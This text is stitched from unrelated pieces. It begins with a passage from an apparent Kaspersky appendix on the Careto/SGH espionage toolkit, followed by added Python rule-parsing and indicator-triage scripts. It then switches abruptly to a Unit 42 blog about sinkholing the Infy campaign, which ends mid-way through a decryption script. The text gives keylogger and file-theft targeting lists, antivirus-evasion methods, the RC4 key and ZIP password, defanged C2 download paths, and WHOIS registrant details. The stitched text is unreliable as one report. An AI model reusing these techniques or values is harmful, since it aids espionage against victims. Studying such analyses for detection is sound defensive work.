DLL: System32\nmwcdlog.dll
targets: PCSUITE.EXE:NOKIAOVISUITE.EXE
DLL: System32\awview32.dll
targets: OUTLOOK.EXE

Exported functions:
0x05 Update the list of DLL loading rules in the configuration block

viii) PGPsdkDriver module

This module is a kernel-mode keylogger. It accesses the "\Driver\Kbdclass" object and intercepts the IRP_MJ_READ and IRP_MJ_PNP request handlers. On IRP_MJ_READ requests, it reports information about pressed keys as custom activity records named "KEYS".

ix) Fileflt module

Intercepts file operations and collects information about files, and their content, if they match the filtration rules.

Maintains the file activity log file: "\SystemRoot\System32\c_50225.nls"

Sample filtration rules follow:
File mask: \ *.PAB;*.WAB
File mask: \ *.WRD
File mask: \ *.SKR;*.PKR;*.PGP;*.GPG;*.KEY;*.PPK;*.RDP;*.ASC
File mask: \ *.DOC;*.XLS;*.RTF
File mask: \ *.PDF
File mask: \ *.DOCX;*.XLSX;*.WPS;*.ODT;*.WPD
File mask: \ *.GMG
File mask: \ *.AXX;*.CFE;*.CFD;*.AKF
File mask: \ *.ENC;*.MLS;*.HSE;*.P7M;*.P7C;*.P7Z
File mask: \ *.OCFS;*.M2O;*.M2R;M2F;*.M15;*.OCU
File mask: \ *.VSD;*.OVPN;*.SSH;*.CRT
File mask: \ *.SXW;*.SDW;*.PSW;*.ODS;*.SXC;*.SDC;*.PXL
File mask: \ *.MDDATA
File mask: \ *.EML
File mask: *\WINNT\ *.*
File mask: *\WINDOWS\ *.*
File mask: *\PROGRAM FILES\ *.DOC;*.XLS;*.PDF;*.RTF
File mask: *\PROGRAM FILES\ *.DOCX;*.XLSX;*.WPS;*.ODT;*.WPD
File mask: *\PROGRAM FILES\ *.SXW;*.SDW;*.PSW;*.ODS;*.SXC;*.SDC;*.PXL
File mask: *\HARDDISKVOLUMESHADOWCOPY *.*
File mask: *\ARCHIVOS DE PROGRAMA\ *.DOC;*.XLS;*.PDF;*.RTF
File mask: *\ARCHIVOS DE PROGRAMA\ *.DOCX;*.XLSX;*.WPS;*.ODT;*.WPD
File mask: *\ARCHIVOS DE PROGRAMA\ *.SXW;*.SDW;*.PSW;*.ODS;*.SXC;*.SDC;*.PXL

Exported functions:
0x14 Update the file filtration rules
0x1E Append the activity log with a new data record
0x21 Append the activity log with a new data record

x) Stopsec module

Interacts with the driver of Kaspersky products ("KLIF") and tries to make its own processes invisible to the anti-virus.

Exported functions:
0x1C Try to make the process with the given PID invisible to Kaspersky Anti-Virus
0x1D Not implemented, only checks input parameters

xi) TdiFlt and TdiFlt2 modules

These modules provide facilities for intercepting network traffic. The "TdiFlt" driver uses the IPFILTER driver, while "TdiFlt2" uses the Windows Filtering Platform API.

Exported functions:
0x17 Return a pointer to the instance of the main class that manages the driver

Although the main components of the SGH package operate in kernel mode, several components are injected as DLLs in user mode. It is worth noting that we have only discovered a 32-bit version of the driver components, while the DLL modules have corresponding 64-bit counterparts.

xii) awdcxc32 module

This library is injected into the "EXPLORER.EXE" process by the LoadDLL driver component.

File type: PE32/PE32+ DLL
File location: %windows%\System32\awcodc32.dll
Compilation timestamps: 2012.07.03 19:53:02 (GMT), 2012.07.03 19:55:22 (GMT), 2013.03.22 11:55:12 (GMT)
File sizes: 22016, 24576, 27136 bytes
Exports:
79002822: DllCanUnloadNow
7900282B: DllGetClassObject
Creates mutex: "{649B015F-A15F-c56b-494B-550BB6237F51}_631345_221507"

Technical details

All the functionality is implemented in the DllMain function.
Connects to the "vchw9x" component using a pipe whose name is taken from the configuration block ("\\.\pipe\{807BF02B-3F5F-4570-970A-8AADBAA55AC1}") and communicates with the C&C server through that component. All communication between the component and the server is encrypted using the RC4 algorithm. The encryption key is read from the configuration block and equals the string "Caguen1aMar" in all the configurations we discovered.

It also loads additional libraries specified in the configuration, e.g. "mfcn30".

The module can execute the following commands provided by the C&C server:
2   Write a new executable file to disk and optionally start it
110 Update the configuration block with new C&C data: URLs, encryption key
113 Update the configuration block with new file filtration rules
120 Write a new DLL file to disk and load it

The files received from the C&C server can be saved to the default Windows, Temporary or System directories, or to any other location specified in the command.

xiii) mfcn30 module

This library is loaded by "awcodc32". It provides a framework for extending the malware with additional plugins and for sending the results of their data collection routines to the C&C server.

File type: PE32/PE32+ DLL
File location: %windows%\System32\mfcn30.dll
Compilation timestamps: 2012.07.03 19:53:03 (GMT), 2012.07.03 19:55:23 (GMT), 2013.03.22 11:55:12 (GMT)
File sizes: 15872, 17920 bytes
Exports:
77001295: DllCanUnloadNow
7700129E: DllGetClassObject

Technical details

All the functionality is implemented in the DllMain function. Connects to the "vchw9x" component using the pipe name from the configuration block, \\.\pipe\{807BF02B-3F5F-4570-970A-8AADBAA55AC1}, for interacting with the C&C server.
The module reads a list of additional plugin DLLs from the configuration block, loads these libraries and then periodically queries them for collected information. The results are sent to the C&C server via the pipe interface provided by "vchw9x".

Figure 22: Sample list of additional plugins

xiv) vchw9x module

This module implements network connectivity features for the SGH components.

File type: PE32/PE32+ DLL
File location: %windows%\System32\vchw9x.dll
Compilation timestamps: 2012.07.03 19:53:02 (GMT), 2012.07.03 19:55:21 (GMT), 2013.03.22 11:55:11 (GMT)
File sizes: 18432, 20992, 22528 bytes
Exports:
78001977: DllCanUnloadNow
78001980: DllGetClassObject

Technical details

This library is injected by the LoadDLL driver into processes from the following list:
IEXPLORE.EXE
FIREFOX.EXE
MOZILLA.EXE
OPERA.EXE
NETSCAPE.EXE
EMULE.EXE
CHROME.EXE

All the functionality is implemented in the DllMain function. Creates the pipe \\.\pipe\{807BF02B-3F5F-4570-970A-8AADBAA55AC1} and processes commands sent via this pipe by other modules. Once a command is received, it passes the network request to Wininet functions and returns the results to the caller module via the same pipe.

xv) jpeg1x32 module

File type: PE32 DLL
File location: %windows%\System32\jpeg1x32.dll
Compilation timestamp: 2013.04.09 14:15:17 (GMT)
File size: 31744 bytes
Exports:
79002656: fnProcess

Technical details

All the functionality is implemented in the fnProcess function. The function receives 4 parameters that define the module's behavior.
Depending on the parameters, it can:
- Delete the SGH components specified in the configuration block, effectively uninstalling it
- Delete the registry keys corresponding to the components of SGH
- Compile a complete system report, including directory locations, hardware parameters, list of users, processes, installed programs, MAC addresses of network adapters
- Call various functions of the "awdcxc32" module

xvi) siiw9x module

File type: PE32 DLL
File location: %windows%\System32\siiw9x.dll
Compilation timestamp: 2013.03.22 11:55:13 (GMT)
File size: 15360 bytes
Exports:
78002078: DllEnumClass

Technical details

The main functionality is implemented in the DllMain function. The module waits until a desktop named "screen-saver" appears; when that desktop becomes available, it creates another desktop named "DZ9PADXF" and launches the default browser application there. This functionality may be useful for stable operation of the "vchw9x" module on rarely used computers, since that module is activated only in browser processes.

The "DllEnumClass" function deletes the module or removes its name from the configuration block, depending on the Windows version.

xvii) SkypeIE6Plugin

Intercepts and records audio streams from Skype. We have discovered only a 32-bit version of this plugin so far.

File type: PE32 DLL
File location: %windows%\System32\SkypeIE6Plugin.dll
Compilation timestamp: 2011.01.17 14:30:23 (GMT)
File size: 73728 bytes

Technical details

The library has no exports; its functionality is implemented in the DllMain function. The library hides itself by modifying the list of loaded DLL files so that its own module name appears as "%windows%\System32\authz.dll".
It intercepts several functions exported by system libraries to capture sound from the infected system:
kernel32.dll: CreateFileW
dsound.dll: DirectSoundCreate, DirectSoundCreate
ole32.dll: CoCreateInstance
winmm.dll: waveInOpen, waveInClose, waveOutOpen, waveOutClose

The module uses an additional library, "%windows%\System32\lame_enc.dll", to compress the recorded audio data. The location of the recorded data is specified in the configuration block.

xviii) nmwcdlog module

Gathers information from Nokia mobile devices using the Nokia OVI/PC Suite API.

File type: PE32 DLL
File location: %windows%\System32\nmwcdlog.dll
Compilation timestamp: 2011.04.26 15:07:26 (GMT)
File size: 106496 bytes
Creates event objects: "Global\9D14093C-8B2C-49aa-A328-35C1BDB2BC15", "Global\8427ACED-9495-4cb7-A13D-B98012DF6654"

Technical details

The library has no exports; its functionality is implemented in the DllMain function. It loads the Nokia Connectivity API libraries "ConnAPI.dll" and "DAAPI.dll" and tries to extract data from all available devices.

The module collects the following information:
- device name
- manufacturer name
- model
- serial number
- list of contacts
- calendar
- bookmarks
- SMS and MMS messages

xix) d3dx8_20 module

This data collection plugin makes screenshots of the victim's desktop.

File type: PE32/PE32+ DLL
File location: %windows%\System32\d3dx8_20.dll
Compilation timestamps: 2011.03.25 10:49:57 (GMT), 2011.03.29 13:40:06 (GMT)
File sizes: 130560, 145920 bytes

Technical details

The library has no exports; its functionality is implemented in the DllMain function. It makes screenshots of the desktop and marks the position of the mouse cursor. Additionally, it captures the title of the foreground window. Collected data is stored in multi-volume ZIP archives and then delivered to the C&C server.
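The LoadDll injection rules and the Fileflt filtration rules listed above are both plain-text rule tables from the SGH configuration block. The block below is an added example, not code from the Kaspersky report: a parser for both formats and a matcher that answers, for a constructed process name or NT file path, which rule would fire. The matching semantics are an assumption reconstructed from the listings: a directory pattern is matched as a case-insensitive wildcard anywhere in the directory part of the path and the masks against the file name, "*.*" is read the DOS way (any name), and a target token starting with "@" (the "@1" in the SVCHOST rule) is treated as an option flag rather than a process name.

```python
# Added example, not the report's code: parse and evaluate the two SGH rule
# formats (LoadDll injection rules, Fileflt file masks). Matching semantics are
# an assumption reconstructed from the listings, see the lead-in.
import fnmatch

# Rule text copied from the listings above (subset)
INJECT_RULES_TEXT = r"""
DLL: System32\vchw9x.dll
targets: IEXPLORE.EXE:FIREFOX.EXE:MOZILLA.EXE:OPERA.EXE:NETSCAPE.EXE:EMULE.EXE:CHROME.EXE
DLL: none
targets: @1:*SVCHOST.EXE
DLL: System32\awcodc32.dll
targets: EXPLORER.EXE
DLL: System32\awview32.dll
targets: OUTLOOK.EXE
"""

FILE_MASK_TEXT = r"""
File mask: \ *.SKR;*.PKR;*.PGP;*.GPG;*.KEY;*.PPK;*.RDP;*.ASC
File mask: \ *.DOC;*.XLS;*.RTF
File mask: *\WINDOWS\ *.*
File mask: *\PROGRAM FILES\ *.DOC;*.XLS;*.PDF;*.RTF
File mask: *\HARDDISKVOLUMESH ADOWCOPY *.*
""".replace("SH ADOW", "SHADOW")


def parse_inject_rules(text):
    """Pair each 'DLL:' line with the 'targets:' line that follows it."""
    rules, dll = [], None
    for line in text.splitlines():
        if line.startswith("DLL:"):
            value = line[4:].strip()
            dll = None if value.lower() == "none" else value
        elif line.startswith("targets:"):
            tokens = line[8:].strip().split(":")
            # '@'-prefixed tokens are taken to be option flags (assumption)
            rules.append((dll, [t for t in tokens if t and not t.startswith("@")]))
    return rules


def injection_for_process(rules, image_name):
    """Return (dll, matched pattern) for the first rule covering this image name,
    or None. dll is None for a rule that matches but injects nothing ('DLL: none')."""
    name = image_name.upper()
    for dll, patterns in rules:
        for pattern in patterns:
            if fnmatch.fnmatchcase(name, pattern.upper()):
                return dll, pattern
    return None


def parse_file_masks(text):
    """Split 'File mask: <dir pattern> <mask;mask;...>' on the last blank; directory
    patterns may themselves contain spaces (PROGRAM FILES), masks never do."""
    rules = []
    for line in text.splitlines():
        if not line.startswith("File mask:"):
            continue
        dir_pattern, _, masks = line[len("File mask:"):].strip().rpartition(" ")
        # DOS '*.*' matches any name, including names without a dot
        masks = ["*" if m == "*.*" else m for m in masks.upper().split(";")]
        rules.append((dir_pattern.upper(), masks))
    return rules


def file_rule_hit(rules, nt_path):
    """Return (dir pattern, mask) of the first Fileflt rule that would log this path."""
    directory, _, filename = nt_path.upper().rpartition("\\")
    for dir_pattern, masks in rules:
        if not fnmatch.fnmatchcase(directory + "\\", "*" + dir_pattern + "*"):
            continue
        for mask in masks:
            if fnmatch.fnmatchcase(filename, mask):
                return dir_pattern, mask
    return None


INJECT_RULES = parse_inject_rules(INJECT_RULES_TEXT)
FILE_RULES = parse_file_masks(FILE_MASK_TEXT)

if __name__ == "__main__":
    # Constructed sample events
    for proc in ("chrome.exe", "svchost.exe", "notepad.exe"):
        print(proc, "->", injection_for_process(INJECT_RULES, proc))
    for path in (r"\Device\HarddiskVolume1\Users\jdoe\.ssh\id_rsa.ppk",
                 r"\Device\HarddiskVolume1\Program Files\Acme\manual.pdf",
                 r"\Device\HarddiskVolumeShadowCopy3\Users\jdoe\notes.txt",
                 r"\Device\HarddiskVolume1\Users\jdoe\Pictures\cat.jpg"):
        print(path, "->", file_rule_hit(FILE_RULES, path))
```

The shadow-copy rule is worth noting when writing detections of your own: its directory pattern has no trailing backslash, so it covers every \Device\HarddiskVolumeShadowCopyN volume and lets the filter read files the attacker could not touch on the live volume.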
xx) WifiScan module

Retrieves the list of available Wi-Fi networks. We have discovered only a 64-bit version of this plugin so far.

File type: PE32+ DLL
File location: %windows%\System32\WifiScan.dll
Compilation timestamp: 2011.03.23 08:04:43 (GMT)
File size: 62464 bytes

Technical details

The library has no exports; its functionality is implemented in the DllMain function. It uses the API provided by the library "wlanapi.dll" to retrieve information about the wireless networks visible to the infected machine's Wi-Fi interfaces.

xxi) awview32 module

This module is injected into Microsoft Outlook processes. It collects the victim's email messages.

File type: PE32/PE32+ DLL
File location: %windows%\System32\awview32.dll
Compilation timestamps: 2011.06.10 12:27:40 (GMT), 2011.06.10 16:46:57 (GMT)
File sizes: 26624, 45056 bytes

Technical details

The library has no exports; its functionality is implemented in the DllMain function. The module implements the Microsoft Outlook add-in interface and ensures it is requested by hooking the OLE2 API. It receives events from the Outlook application, collects the e-mail messages and writes them to the temporary directory.

xxii) CDllUninstall module

File type: PE32/PE32+ DLL
File location: none, executed in memory
Compilation timestamps: 2013.06.20 11:58:03 (GMT), 2013.06.20 11:58:08 (GMT)
File sizes: 11264, 13824 bytes

Technical details

Although its filename relates it to the SGH package, this module is actually a command package for Careto. It is transmitted by the C&C servers as a CAB archive containing 32-bit and 64-bit versions of the DLL and the accompanying "Meta.inf" file.
The contents of the archive follow:

Name                    File Size    Date        Time
Meta.inf                548 bytes    28.10.2013  17:20:12
CDllUninstallSGH64.dll  13824 bytes  28.10.2013  17:20:12
CDllUninstallSGH32.dll  11264 bytes  28.10.2013  17:20:12

The "Meta.inf" instructs the Careto instance to load the DLL appropriate for the system architecture:

#Mon Oct 28 17:20:14 GMT 2013
DLL32_FILE_NAME=CDllUninstallSGH32.dll
DLL64_FILE_NAME=CDllUninstallSGH64.dll
DATE_GENERATION=20131028T172014.101
TYPE=CMD
CLIENT_ID=%client id%
CMD_SEQ=0002
INST_ID=%installation id%
SUB_TYPE=CANNEDDLL
TARGET_PROCESS=EXPLORER
PRODUCT_CODE=C316

The module uninstalls both Careto and SGH from the infected computer. Its internal name is "CDllUninstall v1.0.0". It explicitly names the software packages with their original names by writing the following strings to the uninstallation log:
1. Unistalling SGH ...
2. Unistalling Careto

The module contains hardcoded locations of the files to be removed and of the registry keys to be removed or restored. For SGH, these are:
HKLM\SYSTEM\*ControlSet*\Services\scsimap
%systemroot%\System32\bootfont.bin
c:\Windows\System32\bootfont.bin
%systemroot%\System32\drivers\scsimap.sys
c:\Windows\System32\drivers\scsimap.sys

For Careto, it first determines the location of the main module by reading the registry value from:
HKLM/HKCU\SOFTWARE\CLASSES\CLSID\{ECD4FC4D-521C-11D0-B792-00A0C90312E1}

The main module is removed and the original registry value is restored from the registry key:
SOFTWARE\CLASSES\CLSID\{E6BB64BE-0618-4353-9193-0AFE606D6F0C}\InprocServer32

APPENDIX 3: C&C registration information

Most of the Careto C&C hosts were registered through the free service DYN.COM. Some of the domains, however, are stand-alone .COM and .NET registrations.
The registration data is partly visible in a few cases:

Domain Name: APPLEUPDT[dot]COM
Registrar WHOIS Server: whois.publicdomainregistry.com
Registrar URL: www.publicdomainregistry.com
Updated Date:
Creation Date: 25-Feb-2009
Registrar Registration Expiration Date: 25-Feb-2019
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Registrar IANA ID: 303
Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com
Registrar Abuse Contact Phone: +1-2013775952
Domain Status: OK
Registry Registrant ID: DI_9419517
Registrant Name: Victoria Gomez
Registrant Organization: N/A
Registrant Street: CL Esmeralda No 1332
Registrant City: Buenos Aires
Registrant State/Province: Buenos Aires
Registrant Postal Code: C1007A
Registrant Country: AR
Registrant Phone: +541.141311903
Registrant Email: victoriag150@googlemail.com

Domain Name: MSUPDT[dot]COM
Registry Domain ID: 1080338848_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.publicdomainregistry.com
Registrar URL: www.publicdomainregistry.com
Updated Date: 18-Jun-2013
Creation Date: 11-Jul-2007
Registrar Registration Expiration Date: 11-Jul-2017
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Registrar IANA ID: 303
Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com
Registrar Abuse Contact Phone: +1-2013775952
Domain Status: clientTransferProhibited
Registry Registrant ID: DI_6819375
Registrant Name: Anne Rasmussen
Registrant Organization: msupdt.com
Registrant Street: Storgatan 21
Registrant City: Goteborg
Registrant State/Province:
Registrant Postal Code: 41296
Registrant Country: SE
Registrant Phone: +46.318831056
Registrant Phone Ext:
Registrant Fax: +46.318831056
Registrant Email: anne30@vfemail.net
Registry Admin ID: DI_6819375

Reverse WHOIS lookups on the registrant e-mail addresses:
https://reversewhois.domaintools.com/?email=b753ee475870c3e09055ead90c044880
https://reversewhois.domaintools.com/?email=c3c6c3bb94c5ba815d25041eb9f90560

Domain Name: linkconf[dot]net
Registry Domain ID: 1710052877_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2013-10-23T18:46:03Z
Creation Date: 2012-03-30T12:12:52Z
Registrar Registration Expiration Date: 2017-03-30T12:12:52Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Domain Status: clientTransferProhibited
Registry Registrant ID:
Registrant Name: JOAQUIM COSTA
Registrant Organization:
Registrant Street: Rua do Carmo 26
Registrant City: Braga
Registrant State/Province:
Registrant Postal Code: 4700-309
Registrant Country: PT
Registrant Phone: +351.253204804
Registrant Email: 531becdfa3836a9be267950583190dbc-1471114@contact.gandi.net

Reverse WHOIS lookups on the registrant e-mail addresses:
https://reversewhois.domaintools.com/?email=99ec5b74165233d5e49e48eda905d55b
https://reversewhois.domaintools.com/?email=5349ebc5d0f514a93f68574c1a646458
https://reversewhois.domaintools.com/?email=0c9462fab2e55438f1a5446cea297f67
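Appendix 2 and the CDllUninstall description together give a compact set of host indicators: the scsimap service, the "bootfont.bin" container, the c_5022x.nls log files, the plugin DLL names under System32, the vchw9x named pipe, and the CLSID pair the uninstaller uses to find the Careto main module and restore the original value. The block below is an added example, not code from the Kaspersky report, that evaluates those indicators against a host inventory. The inventory is a constructed dict (keys "services", "files", "pipes", "clsid_inproc") standing in for what a collection script would hand back, so the logic runs anywhere; the DLL path under the hijacked CLSID and the backed-up original value in the sample are made up.

```python
# Added example (not the report's code): triage a host artifact inventory for
# the SGH and Careto indicators named in Appendix 2 / CDllUninstall. The
# inventory shape is an assumption; SAMPLE_INVENTORY is constructed.

SGH_SERVICE = "scsimap"
SGH_PIPE = r"\\.\pipe\{807BF02B-3F5F-4570-970A-8AADBAA55AC1}"
CARETO_HIJACKED_CLSID = "{ECD4FC4D-521C-11D0-B792-00A0C90312E1}"   # read for main module path
CARETO_BACKUP_CLSID = "{E6BB64BE-0618-4353-9193-0AFE606D6F0C}"     # holds the original value


def norm_path(path):
    """Lower-case and fold the drive-letter spelling (c:\\windows) onto %systemroot%,
    since the uninstaller lists both forms for the same file."""
    p = path.lower()
    if p.startswith("c:\\windows\\"):
        p = "%systemroot%\\" + p[len("c:\\windows\\"):]
    return p


SGH_FILES = {norm_path(p) for p in (
    r"%systemroot%\System32\bootfont.bin",          # RC4-encrypted module container
    r"%systemroot%\System32\drivers\scsimap.sys",   # loader driver
    r"%systemroot%\System32\c_50229.nls",           # storage module activity logs
    r"%systemroot%\System32\c_50227.nls",
    r"%systemroot%\System32\c_50225.nls",           # fileflt file activity log
)}
SGH_USER_DLLS = {n.lower() for n in (
    "awcodc32.dll", "mfcn30.dll", "vchw9x.dll", "jpeg1x32.dll", "siiw9x.dll",
    "SkypeIE6Plugin.dll", "nmwcdlog.dll", "d3dx8_20.dll", "WifiScan.dll", "awview32.dll",
)}


def triage(inventory):
    """Return (family, indicator type, detail) findings for one host inventory."""
    findings = []
    if SGH_SERVICE in {s.lower() for s in inventory.get("services", [])}:
        findings.append(("SGH", "service", SGH_SERVICE))
    for path in sorted(norm_path(p) for p in inventory.get("files", [])):
        if path in SGH_FILES:
            findings.append(("SGH", "file", path))
        elif "\\system32\\" in path and path.rsplit("\\", 1)[-1] in SGH_USER_DLLS:
            findings.append(("SGH", "plugin dll", path.rsplit("\\", 1)[-1]))
    if SGH_PIPE.lower() in {p.lower() for p in inventory.get("pipes", [])}:
        findings.append(("SGH", "named pipe", SGH_PIPE))
    inproc = {k.upper(): v for k, v in inventory.get("clsid_inproc", {}).items()}
    if CARETO_BACKUP_CLSID in inproc:
        # Careto parks the legitimate InprocServer32 value under its own CLSID...
        findings.append(("Careto", "backup clsid", CARETO_BACKUP_CLSID))
        if CARETO_HIJACKED_CLSID in inproc:
            # ...and the hijacked CLSID then points at the Careto main module
            findings.append(("Careto", "main module", inproc[CARETO_HIJACKED_CLSID]))
    return findings


# Constructed inventory of an infected host (paths under the CLSIDs are made up)
SAMPLE_INVENTORY = {
    "services": ["Dhcp", "scsimap", "Spooler"],
    "files": [
        r"C:\Windows\System32\bootfont.bin",
        r"C:\Windows\System32\drivers\scsimap.sys",
        r"C:\Windows\System32\c_50229.nls",
        r"C:\Windows\System32\kernel32.dll",
        r"C:\Windows\System32\vchw9x.dll",
    ],
    "pipes": [r"\\.\pipe\lsass", SGH_PIPE],
    "clsid_inproc": {
        CARETO_HIJACKED_CLSID: r"C:\Windows\System32\unexpected.dll",
        CARETO_BACKUP_CLSID: r"%SystemRoot%\System32\original.dll",
    },
}

if __name__ == "__main__":
    for finding in triage(SAMPLE_INVENTORY):
        print("%-7s %-12s %s" % finding)
```

The CLSID check is deliberately conservative: the hijacked CLSID is a normal shell CLSID and its InprocServer32 value alone does not tell a clean host from an infected one, so the finding is only raised when Careto's backup key is also present.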
Prince of Persia – Game Over

By Tomer Bar, Lior Efraim and Simon Conant
June 28, 2016 at 3:00 PM
Category: Malware, Threat Prevention, Unit 42
Tags: C2, Infy

Summary

Unit 42 published a blog at the beginning of May titled "Prince of Persia," in which we described the discovery of a decade-long campaign using a formerly unknown malware family, Infy, that targeted government and industry interests worldwide. Subsequent to the publishing of that article, through cooperation with the parties responsible for the C2 domains, Unit 42 researchers successfully gained control of multiple C2 domains. This disabled the attackers' access to their victims in this campaign, provided further insight into the targets currently victimized in this operation, and enabled the notification of affected parties.

Post Publication

In the week following the publication of the original blog, we observed no unusual changes to the C2 infrastructure. Existing domains did move to new IP addresses, as we had previously seen periodically. Some new install domains were added, adhering to the naming conventions of current domains (see appendix for new IOCs). The attackers developed a new version (31), and we observed this deployed against a single Canadian target. The file descriptions remained essentially the same ("CLMediaLibrary Dynamic Link Library V3"). Most importantly, there was no change to the encoding key (now using offset 20, and offset 11 for the second pass against URL encoding) that we had observed being used for the entire decade-long campaign and documented in our previous blog. From this we conclude that the attackers were unaware of our initial report.
Sinkhole

Through cooperation with the parties responsible for the C2 domains, we took control of all but one of them, transferring the A records to a server we controlled. This prevented the attackers from subsequently making any further changes to the domain configurations, issuing commands to victims, or capturing any further data from the majority of victims.

An analysis of connections after the transfer suggests that the attackers may have used a third-party service to try to understand why they had suddenly lost almost all of their traffic. Figure 1 shows that tool, a geographic representation of victim-C2 traffic, with all but one victim at that time now communicating with our sinkhole server.

Figure 1: Graphical representation of victim traffic to C2

We have since transferred sinkhole control to Shadowserver, whom we thank for subsequent victim notification and remediation (https://www.shadowserver.org/wiki/pmwiki.php/Involve/GetReportsOnYourNetwork).

Victims

We were able to analyze victim C2 traffic to understand who the victims of the Infy campaign were. We identified 456 malware agents installed on 326 victim systems in 35 countries. Figure 2 shows a geographical breakdown of victim locations. We noted in our original blog the heavy targeting of Iranian citizens in this campaign; we observed almost one-third of all victims to be Iranian. Also of note was the low overall volume of victims compared to, for example, crimeware campaigns.

Figure 2: Geographic location of victims. Please note that New Zealand has been omitted from this map only because we observed no victim activity there.

Versions

In our original blog, we noted two distinct primary variants of the Infy malware. In addition to the original "Infy" variant, we also see the newer, more sophisticated, interactive and fuller-featured "Infy M" variant deployed against apparently higher-value targets.
Overall, 93% of all victims were infected with Infy and 60% with Infy "M" (Figure 3). Combined with the low total number of victims, this suggests a great deal of care given to each individual campaign target. The large number of victims with both variants may relate to their complementary feature sets, or represent an "upgrade" path: an infection with the original variant first, with the "M" variant added later as targets appeared more compelling to the attackers.

Figure 3: Breakdown of Infy vs. Infy "M" infections

For the Infy "M" variant, we note that the majority of targets are using the latest version (7.8), and that none are using the older 6.x versions at all (Figure 4). This suggests that these higher-value targets receive much more attention, being kept up to date with the latest version. In contrast, for the more basic original Infy variant we note a full spectrum of installed versions (Figure 5), with many victims on older versions, including the original, decade-old V1, suggesting much less concern is paid to these individual targets (note that we did observe a small number of the older 6.x versions, but these do not announce their version when connecting).

Figure 4: Infy "M" victim versions
Figure 5: Infy "Original" victim versions

Game Over

Shortly after the takedown, in addition to a new Infy version (31), we observed the registration of multiple domains following a previously seen pattern, pointed at known campaign IP addresses: almost every domain in the range box4035[.]net to box4090[.]net (138.201.0.134). These were not observed in any sample C2 lists, however. Bestwebstat[.]com was sinkholed by another operator. Some victims infected with Infy versions 15-24 still used the C2 server us1s2[.]strangled[.]net, which remained in the hands of the attacker.
In early June the attackers used this C2 to issue instructions to download the new Infy "M" version 8.0 from us1s2[.]strangled[.]net/bdc.tmp. This was the first time we had observed an Infy victim being directly updated to Infy "M". This version used the camouflage name "Macromedia v4", changed from the "v3" seen in Infy v31. They also removed the voice recording capability in this version.

uvps1[.]cotbm[.]com was used for data exfiltration, previously at 138.201.47.150 and, after the publication of our original blog, moving to 144.76.250.205. It was also hosting malware updates at /themes/u.php.

They also added a curious C2 entry, "hxxp://box" (note: defanged for publishing). It is unclear how this should function; possibly it refers to a compromised device on the victim's intranet, or the attackers have modified the HOSTS file on the victim computer.

After the take-down, the attackers began to add server IP addresses as well as domain names to their malware C2 list. They also slightly modified their ZIP password from "Z8(2000_2001ul" to "Z8(2000_2001uIEr3". Their new malware version added antivirus checks for Kaspersky Labs, Avast and Trend Micro.

The malware data capture now searches for the file extensions .doc, .docx, .xls, .xlsx, .xlr, .pps, .ppt, .pptx, .mdb, .accdb, .db, .dbf, .sql, .jpg, .jpeg, .psd, .tif, .mp4, .3gp, .txt, .rtf, .odt, .htm, .html, .pdf, .wps, .contact, .csv, .nbu, .vcf, .pst, .zip, .rar, .7z, .zipx, .pgp, .tc, .vhd, .p12, .crt, .pem, .key, .pfx, .asc, .cer, .p7b, .sst, .doc, .docx, .xls, .xlsx, .xlr, .pps, .ppt, .pptx, and the folder locations :\$recycle.bin, :\documents and settings, :\msocache, :\program files, :\program files (x86), :\programdata, :\recovery, :\system volume sers, :\windows, :\boot, :\inetpub, :\i386.

The malware continued to use the identical decryption key seen over the entire history of this campaign.
In mid-June, through cooperation with the parties responsible for the C2 domains and with law enforcement, we were able to get the remaining C2 domains null-routed and the directly IP-addressed server disabled. This is the end of a decade-long campaign, though we naturally expect to see this actor back in some other guise before long.

Thanks to the Malware research team, Yaron Samuel, Artiom Radune, Mashav Sapir and Netanel Rimer, for assistance in the takedown.

Appendix 1 – Exfiltration Algorithm

The malware uses a different algorithm from the one used for encrypting the malware strings to encrypt the exfiltration data, which includes:
- Keylogger data and language.
- Malware logs: installation time, DLL path and name, log path, number of downloads, number of successful/failed connections.
- Information about the victim computer: time zone, list of drives and their types, running processes, disk information.

First the malware adds 1 to every byte. An encryption key is then initialised from the victim's computer name: the rotation offset into the key is the sum of the computer name's character codes modulo the key length. That key is used to encrypt the data (see the decrypt function below), and the encrypted data is finally base64 encoded.
Exfiltration data decryption Python code (Python 2):

```python
import os, sys
import string
import base64
import fileinput

FIRST_PHASE = "OQTJEqtsK0AUB9YXMwr8idozF7VWRPpnhNCHI6Dlkaubyxf5423jvcZ1LSGmge"
SECOND_PHASE = "PqOwI1eUrYtT2yR3p4E5o6WiQu7ASlDkFj8GhHaJ9sKdLfMgNzBx0ZcXvCmVnb"

global FULL_KEY
FULL_KEY = ""

# These names are used below but were not defined in the published listing.
# Placeholder values: point them at your own directories before running.
PDML_PATH = "pdml"                 # directory of Wireshark PDML (XML) exports of the C2 traffic
FILE_OUTPUT_NAME = "decrypted"     # directory for per-victim decrypted output
FILE_ENC_OUTPUT_NAME = "encrypted" # directory for per-victim base64-decoded raw data
UNIQUE_DATA = []                   # first 500 bytes of every decrypted record, to skip duplicates
UNIQUE_COMP = []                   # computer names seen so far


def sub_1_for_hex(str_input):
    # undo the +1 the malware applied to every byte
    str_output = ""
    for letter in str_input:
        try:
            str_output += chr(ord(letter) - 1)
        except:
            print "sub_1_for_hex func problem"
            continue
    return str_output


def sum_comp_name(comp_name):
    sum = 0
    for letter in comp_name:
        sum += ord(letter)
    return sum


def init_key(comp):
    # rotate FIRST_PHASE by (sum of name bytes mod 62) - 1, then double it
    comp_name_sum = sum_comp_name(comp)
    carry = divmod(comp_name_sum, 62)
    index = carry[1] - 1
    end_key = FIRST_PHASE[:index]
    key = FIRST_PHASE[index:]
    key = key + end_key
    key = key + key
    return key


def decrypt(num_list, offset):
    global FULL_KEY
    input = ""
    for num_str in num_list:
        try:
            input += num_str.decode('hex')
        except:
            input += ')'
    result = ""
    for i, c in enumerate(input):
        i = i % 62 + 1
        try:
            index = FULL_KEY.index(c) - 1
        except ValueError:
            # bytes outside the alphabet pass through unchanged
            result += c
            continue
